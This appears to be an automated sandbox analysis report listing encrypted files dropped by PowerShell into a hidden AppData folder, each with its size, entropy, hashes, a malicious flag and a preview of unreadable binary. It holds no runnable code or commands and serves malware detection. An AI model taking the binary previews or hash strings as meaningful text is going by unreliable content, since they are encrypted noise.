                                                                                                    SSDEEP:1536:853406xpk9SjETtEvY7+nGOdNoPP6nQ40i/UEOWm1eArMuyX+ooGEKh/ZSCgPGN/:ygp1/M+FAy0iMiiEoYh/ZSwN/9N/NLd
                                                                                                    MD5:34ECFBAB71737AF475F44A449AD740E1
                                                                                                    SHA1:EA05D8CA6147CE3D1B6CCB5BFA1454840BEE9501
                                                                                                    SHA-256:3862F24EEBE54F57E98FE5CCD368F246F7AC4EA31256A60A9D330C58C9B7D016
                                                                                                    SHA-512:8E4F19761D8AB0E0ACE9B79F2E67767E6455E68B18FE12E3CF3B5808A8DA781C56C300AE234A4826DEDD42EAFBE68B594FEEB76928DDF8E6ED121CF75891E8C2
                                                                                                    Malicious:true
                                                                                                    Preview: w.fXpv.A..Y.`E..s..3B5l....v..:.9...<.d..O.`.....F.....B#.r..=..}..{..d.B.<.......%..:...f.....G.2.B...6...........+.\*.5L.r+h..w....)Xi.}...oJn.Y..i.....F..T ..I....V3.}.s....S.N9..N....O)}q.%....<..*..'i..hE..EH@T.t.........k....g.{...y....s.kWj.....|....T..%*k.6<...6G.cg...*.J...^.n*...-.uHt.!-w..S.J.A..N@..v]M.n...3^.5.x..b....}.'.s,..WPgmt...0w`.......O.vIN.@.|.gY5.PE.U.6...}.z...Z.n...v...-{.8~.A.1T.X.n.s..u..C.!..c.d..S...@...9.....5j.}....fxR........e.2I.w.4x.Ga..-X[Q_$k.!.H?.Z...R~V. 7..!.sq.1.....q4'.3G.j..d?S{}..tQ. ..>...B.VK..<..+."R-..S..b<......e.O<...oQ....DQ..S...=..YG.c...nAO.|..Wk....s....0.]h.e..zc..^8:..lGcZ....'.|..E....=..~..}0..~...h^.-.S..7....:H.y)...u.....O%....K.c......C..UU=.......BpX..?0.a$..(....NVTgS.S...Y@.{..izA.Q.xT..l........Xf....-.!nl.]...........u.CN..\d.]rVu.J.e?.}.pM|?l.yf.w..4A.Q.....*([).?{f.G.....>.....nA.Ln.{G.["S.C..&....B=.......Dh..^G.....2..s+......*..T....A......[..U.%.!..^...h.!pn> .....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NmwdaSHLzrKcG.sUTeSQCDqMglv
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):93167
                                                                                                    Entropy (8bit):7.997908263465283
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:7PIfQ/5RqBsmmCAx7SjtBF7qOthcs058P5B+Ne++xshhz2RpkG/4zl6lt1:7zOBaqRqkis05mB0enihCpkG/O81
                                                                                                    MD5:99BF3DF334C89B3954DF26A6A4865251
                                                                                                    SHA1:E34B2A4D31EA7618C98E9C2F0478884BA2B75EF6
                                                                                                    SHA-256:009DF2BF74E01A19DF11A6EEBE82F11EE0BC6BDB0376986086FB5F3FB0008219
                                                                                                    SHA-512:DD9F5DC2D7897D50B3B02B0E4988875740EB881CDAB86754CC8FB60D31F05B2E6D81BC497E3EEAD23E3EC450C82390F04DEB44BBA708D9FC3804A5E0737FDBFE
                                                                                                    Malicious:true
                                                                                                    Preview: ....~..i.0b3+M.L(.....$,.[...N....W..E1..$.C.l.c.r..C.=.v".U.q.yY..0..a,.X~f..e...[.d.........6.M.2,..a.O._..2f8......b..R/.\./.....K....ZnF..]Q.C....zb1|../....N.I."A...I5v.:...r....5.}..!f?..J..w./...J.RE.A.GC1...3.x.Y<....g+.+...R..>./.8..r..6..[.0gj.&.....Um.I.d.....*yK..4.dtO.~#..y.7..B..u(.b)..m....2nw)\x..c....?2..iKB...Kh......G...u..L.........c. ..+l_Y-^......L2......0t.O.^'.)...`~S$...e.<.+.I.s..9.\....w....N.9.v...`....l.ko...H..\..%...f%]^"E......8.Q.yT.(.c..0...\...bXlZ.d%....iM|$q...QYh..lv.+.t#...................A..f....q.....W.C...."^..&..>5'..2...2..d.52....B..."..;....2.g.........U.,!DV..b.R.._l.n.t..pq.6.8W{...Fh}...j-. .?N.M7%>..`...{.......SVW.U.F.1Bk`.2=....V.5?-..j..\.s.Uj.iv..EIX.5.q.....J.n'C7....G.i.......R.... T.F...."B3.G..t...s.3B60.1...y.G.f1J.Ur..Bg.n.w.%.|P..S....J......).2Y.....df".S..>z.......y...2.M..x..D....`.(.t..z o3%d.F-.....1b..`Z#.6.qc.M.p...6<......a\......IR..b...c..q]e....Q...J..X...c......v
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NnbGWhVIHviQJUCl.emqxByXsKfNQDIlcZAr
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):110466
                                                                                                    Entropy (8bit):7.998235375845279
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:egIpVhAiGJCWPZfcPICcpo43F7KI2VsGKTlBp+cE:IYiGJnxf4xH43F7RzMcE
                                                                                                    MD5:97B3A7A2DACB4C5C22FD951688C9CEBA
                                                                                                    SHA1:58317A450EA1246578008CAF03CAEA291BB32223
                                                                                                    SHA-256:B298CFA8C4B102F467874376C771113BF3AD3A9DA45A626B1DE459B2A7BF7875
                                                                                                    SHA-512:F1106010F40A929BFC5A93F9D2CCFF28A70AD5091B1E2A930A6539DD0991ED6E3D36A90A1DAB1BF547F7AF79AB965BE519973E2BB727033411613DAFF5BA4138
                                                                                                    Malicious:true
                                                                                                    Preview: `..........n..dI....1.....).BJX.II......9o........@..!>...2.3....>{.o.....@d=..v..u...(.....>............6.........Hi.#S.......gbJ..V..i.1.5...%.....g...5..KD..>.p..q...?.ld}X.`l...-%_7..o.....Hyb....y'......f.t[J..lfo..Com....X.'...z._.....!=.J....@...C8....c.L4......."1..>%...3.x.A&.;..EQ...........~.LT.....0..Z..{f....._.T..H,..[/..RFv}....:...7<B....j .s..h.......xo.R....oGeA....YF.B....E.;v.....[.t..,R.V..PQ..5.`.....3..m.+.R......l.6.U...Oy.6.....l[.D.....6........ Z$HG.....&.....4K.e.P..R..b.A....i.#..&.MQl?f..^..\m6.1].....r.....8.7.m........S...F.U_........#.n..Mr........V.....+E.J.).. ..@..}M$.W.S....!...M.C.<.Z.)D...).6...r~7o.5....M..;.V@@J....h..P...J}.a...Z..Y.^...J.n..O.Y..J.%..a.0lG.x.|o......1.KQ}\...z>...w......].......4L~...uy..9...82r.Z|Z.xb....9.O.6+.......QU.....s..P..$sJ&W...L*.-..}T.....T.C.#$e#...f..j......*..6 ...(64...k..t..)%.c\...^.,.f.)/R[.$ob..|.....x......g.c6.....;.hq^?.H"....I....)$k.u.....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NqklLpvEIisy.iUnQhIslVWz
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:MySQL table definition file Version 160, MySQL version 1757676594
                                                                                                    Category:dropped
                                                                                                    Size (bytes):136940
                                                                                                    Entropy (8bit):7.998795675164957
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:sS0wtjI4yAzas2/+Zz4E2GD9/0X9ZL1dPjqKH37QmctZeua:Rnt/u0z4E2GDW/RduirQ7Zna
                                                                                                    MD5:0BC6C7CA4AEDED7864FA9448874A6B48
                                                                                                    SHA1:4882EC4A610658FB01395CE09491196957A5E99B
                                                                                                    SHA-256:E969CEDAEF79369803436270907A7230017C2FB13355EE99356F6B693B21C7C8
                                                                                                    SHA-512:7535EDB90738C8A9E0904CE173351090AA6CD1D334560963DEBDC911D9EE4C56256C27866AC10F00222C49A8D698D2D97F887B5B1BA3EF3CBC7DD14231FEBCB8
                                                                                                    Malicious:true
                                                                                                    Preview: ....HD#..xL..J.IW_.AY.[$.s..y.\8a......Z.E.;.Gl.Q.2..h..{...@...o..r..j<H.. .\...9*4.]&x0........._..0...{T.`..:.......m.JmV.(.%....{4bl .4..0Q..o5.......'|Y%D.;.'.L...s.......Y.......*.......kp.")ZkU...R...%z.....,./.Dav.`..U.....3JA3m-..(..b.s...g...&.:.@.%.I...TZ.}.`>z...ENC.....2.V.;,..R.x......B.3.R.%W..Wb.tw...G..A..s(=V?.<#........0..9;hRj...C..q..eG*.....4e>.|4..E..X....U...K<O..^.4`.m......v.T..H..<T.z.W..(.O...8.sEJ...I.....P.I'..a:......$9....xN..G4...e..0.3.pJ[../4.m,...|..4.lL@Da.<.t....4|V.E...............0...MQ~.g.)..h&.B..M.ijZ..x.m...){LP.>_...oZ.F.[..Pt.y4..*f.RO.&.`....(R.{..{.!..?.}.F..'.......d?..LK...#.D.....7...!../....D...."z1-.)....8.....J..2]./...F_...........oz.."C.D.r5O.......,$....t....K.}......G........C.Mi.o....h|.0r]`..&...{Z...h....=T7.b..L.a@.\.Y..,...6...g......%.d+.;.:.U..@...Mp.I...i..w....;........hD.L..M....X.W.>....y.[.......<.{6W+..tI:...n#'.B.y.5s.Tv..~.dG...5!...l..?.<...Y..gX.......S.ec....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NsDTEAkUtyzhBJpa.YBGdolRunAaDWCNk
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):85890
                                                                                                    Entropy (8bit):7.997530190160418
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:rXv7pC50/YuAx7ZXR0hrmHuBKeIclqBU7ln6DdNkqGu5dx6fZP:b7pCC/YFVeKusehWOhP
                                                                                                    MD5:452262995CB1A72291952ECA7AA9EA4A
                                                                                                    SHA1:B1A876F89AE3C8C7AB13725D5FE793C54BC232A9
                                                                                                    SHA-256:7D3054F896920F6D3E9FAF4202AC40D26DB2E564BD245CE0C5B7FC8AC827C867
                                                                                                    SHA-512:0EFF9AE517892D6ADB03301B1557F44536EC0F0B1862969CD9EEEDEF4BF4E1063998D774D800D09C8584E037D38C6F711AE4D4B94C4B0CB64320F766D1222BC3
                                                                                                    Malicious:true
                                                                                                    Preview: .N-. 4/.....`.....{g..5..../...(...Tl.i'5......4m,#..Z....).H8.0 /|~..@.<...o=.".n#-t....Z.h..Zz..k....W.i....p..v.`...E}..9.'...1..0...NI.;...@.ez..{D.>u.+B..A........n;c...3.K...*.z....../E@.9./......?..5....e...S..D)6y.....F^\.).!j*;..u...._..;.H.KVTG.3.48.<B_<Hr......d...A.&......F.#L.K.=..X..9ogin.|.<.....E.`..^..v...p.O8...r..aT.iu.H..q.z./....Y....)>["..........E..i...X....1w...L..]7q..2h~.._..P.Lm....6=.....z.!X.bl&wwQ*..(.'.@%2."..3.,.l.q.=C..Y&..h..J..3^.HT..5.a8iK....-.{.9..0....i..O^..x:... ......ib...$z.$.L.Z.O.$T^7.oA..r^........*.~.w.[......o..X.`..v..\Z......")z...S{...l..........X..I..%..E..>..e.\fc.....N5...u.....2%}.F.6=..j...AWuJR..S.M.....k.}.K2....tJ..D.a..(.mB..8/.O{.m...zF\.w...O!p.i6Z..BO..ET~.....,;..!V.8......n.....dR.....a..4.q........a...t.2.q.P..U.+../.Y.9.T|......[..#../....].U...y+..p.f......5..........m....Aa.....).w.H7....'.....k*<.........S;|.9..aX.t.a....i I.,Z}..X+.".(..]..A\(o{.q..{.X..,.\4&.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NwpDsZzxlvWftkb.GPjxFwVuMq
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):51436
                                                                                                    Entropy (8bit):7.996836363197158
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:768:7Ua8JUmQLe1LAmG4BVH/ExbmBjWSeUu6RRvW/jwua+oJzXF0ts89p6opNAT6Jb:oaxLe1LA6PfEu/FSjfiatsMYopNATMb
                                                                                                    MD5:7F415090B824466902F716089978C8BD
                                                                                                    SHA1:A712A2AEAEB9DF264FE20FDF74EE6189732F3CBC
                                                                                                    SHA-256:77EF6288C2141CD03E78112464F2E43388685E164D0E2E228342442B4DCF1C32
                                                                                                    SHA-512:79907AF5865479EE45A162AA069D6549B84D86C774B07185A6AB6F985504E2C8261AAE876F19A57FAB8898597801A00B5F30DEE80943B5F333C168C5B82D644D
                                                                                                    Malicious:true
                                                                                                    Preview: }r........qqG..*].Y.Nq.. .....0C.....).T+.N...E.eM..."nT.hA?.....%q./..F?...H..ab.l.{.~..N......._..5p..V.Y.U.*.Q.WG(A.p...Z.i..F.....3L.$J%.4...-......g..9j./...sQ....q...oo..M^..7...#.P.kX.UV&.u.1%..H.%..!.;.m..t....X....x.I...,v.C.t.*.J.N.a...X...B8I......@. .>$e.......U.6.R.{..&...*.K.S%.jA.e.6......x.1...k9..=p:.b~......'@..n+..v<6}..^.>0G<('..Gu.b.......@JsS.4......B......j.y......#..M.....a..x....R.N ..TW7]..[.Y...FM1.......Z....O.#q.....{.#..N..!.zg."..E.<.QW....r.VX7..u:..5mF7il.eH...`....;$.....I.z...........n...q.....9.zo..k{..!.....h...$R9 ...i.T......0....V.FL.+1X..A.....Y.....?..G....Z.........T.R....G.~.....4.!.H...]...!.8....W.S.)...O.M.@i.}.y./...P..&.E..!.(3...C..}..n....e!..bH...8......6Ch.6.Z..m.1.n...a.FV.tY.X8.s>.....RQ/&s..)Vf&...%.L.f.......WyU...7.2..:.0......q....D.Qc.6....c8.G...y6,4.....g..E.!...v.T1.....~.......f.e...6..9.eoT..V]...]U].1..ib...x.N{......ips.W=.N....e...].E.a...k..H$."...d".........r.?..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NzJhdaGvYQIMCWXyVo.abCQEyeiskzcHNr
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):165928
                                                                                                    Entropy (8bit):7.998872646601057
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:qAoIDe24ajhzXuj7YYOsF6Cr7Na3o5Z5z8RxfTYodgd7SezaVOqk:qAoIC23hu/nFxrA3o5nmDtVOqk
                                                                                                    MD5:28BFD6478A851C2E855D2486B985EF7A
                                                                                                    SHA1:78DD5C3342BE1CC0D1456944359564B45454C7BC
                                                                                                    SHA-256:84923788E59DD25E3C11196A08B01538C75110F9B53CD4EE5EFA7BDB38066C4F
                                                                                                    SHA-512:F88A7EF997B5D7FBA02665CAFAB8498E8891C6E4C8FA35B833BE0202695B990141C714ACA17554A972AF4D3FC933FB8E3A4DB008423DE6E01E2AD87F0945FD19
                                                                                                    Malicious:true
                                                                                                    Preview: .'..H.l.5~D..a.o.k"..-E...Ue.H..J..<..4...V5'j..j.rR.......6g.....h.....y....ry.r."......3..cB2._..W.j{c.O. .,/...].....~.j.Uf....S.0.L..P........n.Q.p.......c9^Y...~X.:..{u..z.aM..u..3.V.M..KKp.M'....j.Y$a..........^'..J..0)D.,.....^|I.c2&.........{sE..i.t/..X_"c....?.....S$.v...g..?L...+.3R_o..r...}.g.}..xDA..'9.G.$.3.|...J..ji.............+%~O.N.j..ri..P....A.u*...c...).(w%.l......oG..`.]......n.....6RH..c+zO.......N.}.l~... .)...0..i.&.B.4...VO....jbmbq..1.o...d..Ok_z.s.m.p.....I.HK.NB.".9..2.r~.t.v.T..s..H.q.R..R....=.V..:..X.Aii.|n\OY.h_.i..z..e..B.NX..Jj|..X..x2tQ......A...X..............:...1jd..\.ikw.5%.i......3....74..Kf..C!.T....}|.r.!MA..".7z..$.V.+$..hG.......l~k....bS\......7v.-.QW...K.'#3...T.....e....\...o...&W8k8z.+9L>U....o)..x...V:W..!. .-.Y.{.....p..; ...:...V..."...+m5...K.....;.O4....8..P.kO.}......_.-.-:.*..L...[....&V...K0.G....~.lw.....y.P....B.8.+.......$...x.F....L..A..7..{.........C...._^.q{.S^..5h-.n.X...g.}.r*....8?
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\OJqQGEthlPbxWXVi.IREbMveLuPj
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):129085
                                                                                                    Entropy (8bit):7.998683165330235
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:v14N52WMVTie3x4zFvEuthaProSCjAdgXE39oNjD4cPFesixO4:vqN3MBie3xuEuthO0S4AdKGKNjsZsif
                                                                                                    MD5:3E2FD69A59B4FC437A8F5CE80E51F104
                                                                                                    SHA1:BE5B1CF3F6E64A4729E40875FAE3CA3B571B8D3A
                                                                                                    SHA-256:828E09A9018F1ABC32FF41FDC20F172F31AAF2D1BCA857018CAD6F27704DC860
                                                                                                    SHA-512:8117DA1BF6DC2B6B48FA0895514276E8F983886C4CAF5C63BE04126C720D3968BC1757A1DAEC89000E2952F2642E6590E28C0BCECF47E7E8DA55374083448071
                                                                                                    Malicious:true
                                                                                                    Preview: S&.f..h......6MS...;.s).l..Jo1...~*...*Jl...u..}.H,lK..K..t5.>..M........N.&.X.J.0....]........'....)B[........B;.T...,.{i.[.`....</. ...R!..1..k..Aw|.S.h..K..9........M.P.....&I.OL.g`..'.L._.......\./.To9.=.V...L...r..zF...x....3R..f5.'\.....o.Z'5.b!NZ.'...65.K.....,S"JVvd.>.../..9.0.X6>f.g&b.d.dl(.......S.8...U...YdAl..../.H1W2..x....f.a.T.5^...R....J...4.."..-z.p...........E.9&..-........(......j..u5....hCX..`....(.+...~j[.+.6.la.<.?HK~jH{.0..9..........Q.1,.U2.76V..P.IjN].Mg}..d.r.7^.3.=L>x%.<.......5P....Y...m.u...Y..,.7............Dt....4q.U...Q'Y..zH.L.c.........@K..r..>UF,...p..l.u.....(..l..(..d..lE.X..Y..P3.e..9z..y]..pX.:...c..O.n.e6u[.L..J.Qc09.j .+....o'Lx.6U..C..........2.t..m.q..>gr..>......Q.gJ.ZC.......5Q..>*+1F.d.Bs.W...Ebn}yx5...A........E.........Rxh..a...%..AK..p%vj.P..D.B.....^.n.U.iB...<....u.e9'..YR.."....*c...'*a..n....|.^F....J+.i/Q....RY..>....Q.$(e.n.J....U..^..7.)vb....P.<.Em....b.\.a..9[.B..*O.(:.........
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\OcynixVmLeJDf.JkwQlRstjfhIrmu
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):53847
                                                                                                    Entropy (8bit):7.996723534342086
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:s/qYHPle/u7KnzzqwJJ4sa5XoGHEQf0vD:spHPlhAJJ4sarFfW
                                                                                                    MD5:CCACF0D786A73122A8B9211625825F1B
                                                                                                    SHA1:4E9C759319DD2C517CFEE9C9790F4003B3EF6DE4
                                                                                                    SHA-256:A65AC9B06C8C8345A892A84F8578155B4DEC8A4274960478BFA9AD262D316277
                                                                                                    SHA-512:F1F1C08B9211DF57257720D7885E2F4527D753FF3F565E2BB0A5F349695072601E948070290FEED748E96783778E34CD69FBBFE83CC5D2CF6898D3649CCA08E3
                                                                                                    Malicious:true
                                                                                                    Preview: ga...v...e.I....=...PT*b.9f.J.Q.....aE../....B....n..H...H.=..l...N..+(...a:.-H...j?.|.......M....Z...w.v..Q.......PB.X.8.\;.D.3D......'...6..%M.....W;.K.._..K.x..w"{M.(=.x....s+.{...%=...O(wy...*.Y.o..@I..JBwa..;Z..>A]`...C.gH...<..7..Y#~.......-^.Q...B........>Pb.I.9....'P ,S.0x{-.,...M...C.c.5.../.,..}......YX`/$.v[R.F...%.....Hd..G2.8..6...^.....*.B.........._-...#aI:...{.4.hbj9...z.o.. _t..04...{...y...Hn9..BoM.\..X.4...F..$...Xq......%..:1.`..zR....z.....#.m.b._WdC!}3ACn...A.f......e.*..<.y..b....|UO6...MyN....R..(S'...Z5V.;.W*wz._..G..:.J....<y0.)-./.[....XJ.ai..]..jR.U.1.F..&.NM./.....V..l.</k..h.o...~.q......:1.....#c5E}..wT..^...RKh..&,p ..:.E..s.).8#Z.R{..@3...:.}&o.6.$.!X...c..'.F.'..:.AZ.u..I.........O9'.m..H.4Z .o.5R.jD_L<B..^..2.;....s=o.%-............h.T._.>..........1nUR.f......7.....S...........y..~.1Nm.<C7E......@.n.cV..Kw.#..~..)io......cN.-I.9N.o.Z'.....37..Y.H.....8.uH3]J....M..A...9..V.......$...g...|..9.\..wp..#
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\OfxkdNtvzrul.HfuIkQZjNpzDtBE
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):91124
                                                                                                    Entropy (8bit):7.99792135658027
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:prYDRgg/JkCotDXGL2xX1RJhXdjrsiR1TfLz13AM76vfCqs2/xBjbHXhHmhpl:Lga1xX1JNBPfZ3Adv6wxBn3hGx
                                                                                                    MD5:62F9AEE86E52AAB962B139A0AA87C808
                                                                                                    SHA1:0057E2DBFAAFAB1006507B1056EF07C2759483AD
                                                                                                    SHA-256:B649858AF996FAD8E1E00FE39DC9A01B32BF777B5EF3C9656D976E7B9DC4F7F3
                                                                                                    SHA-512:A74B5AE50B814A42C8ABAE05B5E4FCACE74CCB8C6CBD24F709950759399081EE0AB9BA2C825B65D5505890DD33971F249C918A4C5B2D714F6E36C4F119877DA5
                                                                                                    Malicious:true
                                                                                                    Preview: .M.......8xt..p.jb'...PA...]K>m.[.U.2I.....,!.D.j.._2z.6.5.)GO........2...s....?.E...e"Z...Q.kO..V>..PgV..?(...&T.".L...1q~..L...Vu...M.%.S.....IL@pb..^..7.k.m J1..,k%.B.b....Q.gjn.B...Q..s~q..3;Y.|..'.-KS ......!.y.=...0,..l...3h..G...k......lx..3.,..L.rh....B[..V..r.*..2.09O..|~...?P.............GA......7k;.....Vh.D..D....."l..;.`#....u.......A..ki...H.5..I..<..K........3.)...@>.].6.V.[O.J.T....L-....mnv=..&.L...T..gs.*....H......[.i..=...#......%..[.,.....,...;.....)V.C.B......W.....bz'k.....c...n.cL.gj..nS....R.v-.:...>.l..Y...T.R.0R8.s......T;..4.4.U.....B%w... E..j;u.6...@..v.cH....Sp-. ..6..3..".....m.a...K.\/W..i<uU.R-Y......y..x....."..t..W./6..Yii......Y..y.-..@..pX3....T8$u..... .../.E............6....<...m..c..yu.j............b`..>.b..dq.3..9g.....^U...+\..}.1K.....OC0T..O.&YG0.U9O3mxf......m.5..lG..%....=~K5t....].....w ..>..I..O..*}.^.K@...<......RK,...........K]sh..:..O.F......S.q.lz%.......Vi.=h..s....Ee6..t..@G..CS....v
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\OhzWVtYijvsgNyRIPo.SOmGaUYiWFcLyTk
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):54603
                                                                                                    Entropy (8bit):7.996813895772115
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:768:FnP0IyTZnlBpKNL8hX7ewoU83/MVN222xz2pWlL6nYLeToYKKisLYq6WQ2l2mC:10nQLOLewy/N22xmALR5YKALYpjRmC
                                                                                                    MD5:6009CAC5C31C4FA1C722056CC02C2C3F
                                                                                                    SHA1:4BEE0F0E6106F8B31CE76D0249DDF72AF600325B
                                                                                                    SHA-256:0DB76FE69595E66767F73F36755489A288B4985A2E2FC7A931D8ABFD5700D8E5
                                                                                                    SHA-512:AE5F03F70D74F53CD6D63ABB0C730D8BC49176DB3B484850F2B61CD5E63275ACA31E8DBC4BE032CAE5306C1452F52B527747554C53B4ECB0C7DC11A7320DF9FC
                                                                                                    Malicious:true
                                                                                                    Preview: .%.....]"U...bVa...)y..|.........Q...$..~I.P..(.g\..........L.'...:.....VP+...[.n`WmF.^4.*.m...)....2.....8luL.GD..8..N.V.{.UYF..C...V..>Z(...Z.&..;..[.&tE......x....!<...;u....../m;.9..Jq....#B.K...D...T....5..|..!=....M.....2....2r.o.....};..)JW ..C...X.u.~.p.2JU....3...u.<.e..!...}{...A.z.v.|..(n....'l.g...l.V.Z..r...z.hY....o...Y...SOY..5...u.!......<H.....2....W..#A.(E.9.4W..T..@.......!}e.x........OS...P.(.O.X...|....#k......O=.O.ru..`.lb.j^..8.....\+.:..2u....m*..../.'.=i.....+R;..;.-...a-..N....f..5j..>..V..dz....ir50_...r....iU.6.jN\.*...,y......_.....h.6......R.a.._....\.t......,CT.>......j..._v...t8...>......K.&q......|....p...=C.5............^R.!}..7?..t..8....2<=..g....w.E..........".a....OR!..S...I`.I...eh.yc;uFy%CE.o..x.i....v..r.2v.o..r,.........~7...R.g\ig.^...F.t..s....U..mSz.-.;...|.....Po.)T.......'z......]1.....&&..p..<..W......r......$...k&9...6.=...l.....|#.=Ox .%..K..*>..:.7..:.h.!.5.r.i...,..._Gj..A......,..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\OwLvGfFIgjatNhXYk.jDUyZcMJCXF
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):63548
                                                                                                    Entropy (8bit):7.997068000610037
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:HSAGIteP+cNvT77mgvvHFLuOTAyG3J0wlG:yv4edvLlfFaOkJu
                                                                                                    MD5:CE50037F2D4DC994954C7A4A862D67DB
                                                                                                    SHA1:B4920C10C2C8B274FCCA81F67B2D63F4B9C7D707
                                                                                                    SHA-256:186794DB281BB51BB1E47E023CD90BD63EC346649448920AE683E9700B16563B
                                                                                                    SHA-512:BF261BCC21B3DDBDA44B9B16C625A6DA73D1832BBD6EF79E49DD24870F72AE18444238FFE444270B60FEDC50B5BA60D6C1EAF20D3E9B41A00257538FDBA99DAC
                                                                                                    Malicious:true
                                                                                                    Preview: s.3.2.Eq.1...p....M..+..U.I..;.l.H.r...:.....'...t4...H..........F'.>*..Mp...-AGdH..L.....=..F...s5.,.....".......'..Y#b..*..L.:......'C.}".?..r 8s%........L#b$z...R.....!7_.B.8...2.Q|Mx..!..Z...... %.s..tx.D..e9EO.fIC..L.....x...6.......j.#@{.o..Z._F.......x:..F..2..;........#C6..)..Z....".5..{...;........U..X........&...j+f.N..Cq.NP.`....X...s......>A...C.H..(..o;...Q.@..R."8...\.R.:..L..:.s....a(...:.".|. .6.l..9.5)..P.r.M[?.i...%b'...7....[.8.)..p79.......<.<.BGi.!............+^ y.q.+P.B.......?g.iRF_.......&.Y.......9.U.i@.$s....2@.$....A.n.:.....v.^0K.p..Yw.dM.a..q2.YNO...u......W%.j.-..:83 ..0.`.G....-..4.t.CI...0....r.......Q|-.:g.=.2.U....*=X..v.....@C.v:."..v.L..R.....v...G..M..%.d.]........so.m.q..c.XC......|P+..4W..K.....@V.j...M..W.....%h`#C..9Z......M...u:...'.y...[.~..h.L.1@.,..@..-.JF.. ."b...&0GA..N..D.xxB1..w....~...G.*.&.d.......S*...lD..{....U..W...`..r.r....d.a.T|.;.i....lr.p.Qq[.Z...~Y.+i...+...L..........A.Vs.C..n.#..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\PFeMhnqZuxdjwLs.FwsfCuyJHi
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):121679
                                                                                                    Entropy (8bit):7.9988958976011615
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:xc4OFOViK9TEAKWOR+pZkwX1GohxkOb0Fijy5P0jx:xsKhEQ/ko1zhy9ijUqx
                                                                                                    MD5:CF7737C791581C26959329A9EF5A3601
                                                                                                    SHA1:19E57025295A4CE92F3485E35720C3408B138D5B
                                                                                                    SHA-256:9471E53447ECD49F216F1B2C8F7913B63B745B9604A734B16ABACF34C98B0A3F
                                                                                                    SHA-512:B17E49E8E45616CC9A160424480C1745AAABD6E659E98880494DB901DA1226B7551AA77F7321A2D14AE21E0E8C83EBB69A04FE14649080C94DC53FFCD8E7CA5B
                                                                                                    Malicious:true
